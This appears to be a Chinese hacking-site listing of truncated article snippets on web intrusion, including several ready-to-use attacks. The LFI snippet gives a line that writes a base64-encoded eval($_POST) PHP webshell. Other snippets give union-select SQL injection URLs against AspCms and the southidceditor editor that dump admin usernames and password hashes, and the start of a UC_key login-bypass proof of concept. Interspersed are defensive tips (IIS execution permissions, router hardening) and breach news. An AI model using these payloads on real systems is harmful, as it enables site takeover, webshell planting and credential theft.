LFI漏洞利用总结
主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 po...
LFI漏洞使用心得
1.找到LFI本地包含的漏洞 2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式 3.使用如下代码 gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?> ...
aspcms cookies欺骗和后台无验证注入
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗! ————————后台注射———————— https://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,l...
让webshell无法运行
其实就是运行IIS的对目录文件夹的执行权限设置来达到让webshell无法运行的目的 您试图从目录中执行CGI、ISAPI 或其他可执行程序,但该目录不允许执行程序。 Interneter服务器管理----IIS中站点目录右键----属性----在主目录中 查看“执行权限”一般设置为“纯脚本”,脚本文件才能正常运行,设置为“无”则不能运行 把www.webshell.cc...
黑客入侵叙利亚总统邮箱密码竟然是12345!
叙利亚总统 Bashar al-Assad 正因屠杀平民而面对全世界大多数国家的指责,连黑客组织也没有放过他,在星期一攻陷了他的办公电子邮箱。这次的入侵事件由著名黑客组织无名氏(Anonymous)发动,而取得目标邮箱的密码并无需使用神马手段,因为他们使用的密码简直弱爆了,就是“12345”,根据2011的一份安全研究这是第二弱密码。 无名氏同时将邮箱内的邮件向外公布,其中一封被公布...
iTunes用户账户莫名被黑,gift card不见了!!!
苹果在与黑客的较量一直不占上风.很多iTunes账户都出现了余额不见,或是被更改账户资料的情况.大量的用户被购买了一堆应用,有些账户的PayPal以及信用卡信息也被篡改.类似的事件已经持续了一年多了,有人怀疑苹果是不是故意不打击类似行为. 虽然苹果并未确定类似事件的原因,但是一个很可能的解释就是苹果的gift card算法已被破解.因为可能有人知道了如何生成gift card,所以也可...
多多返利程序,任意用户登录,甚至可以提现
简要描述:多多返利程序,任意用户登录,甚至可以提现! 详细说明:https://www.webshell.cc/uc.php 在后台未开启ucenter时候,存在典型的UC_key未初始化漏洞 由于UCkey未初始化导致访问者可以随意调用uc接口的各种函数 其中包括自动登陆 修改密码 漏洞证明:poc: <?php print_r(' -----------------------------...
9招预防路由器遭攻击
既然了解了我们的路由器容易遭遇攻击,那么该如何防备呢?在这里给出以下几点建议: 1. 及时更新路由器操作系统:就像网络操作系统一样,路由器操作系统也需要更新,以便纠正编程错误、软件瑕疵和缓存溢出的问题。要经常向你的路由器厂商查询当前的更新和操作系统的版本。 2. 修改默认口令:据卡内基梅隆大学的计算机应急反应小组称,80%的安全事件都是由于较弱或者默认的口令引起的。避免使用普通的口令,并且使用大小...
大规模win服务器自动化安全检查
某公司win服务器众多,做加固的话,每台登录上去手工检查或者跑脚本都要花费很长时间。 于是想通过写程序登录主机,跑脚本,抓到不安全的配置,上传到某个服务器同一归档分析。 然后程序循环这个过程,抓取所有主机的不安全配置。 原本架构采用终端登录器管理所有主机,登录器通过某个数据库取得主机ip、帐户和密码。表结构类似如下形式: ip user pwd 192.168.1.45 administrator...
南方数据编辑器southidceditor最新注入0day漏洞
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 直接暴管理员帐号密码(md5) 2.登陆后台 3.利用编辑器上传: 访问admi...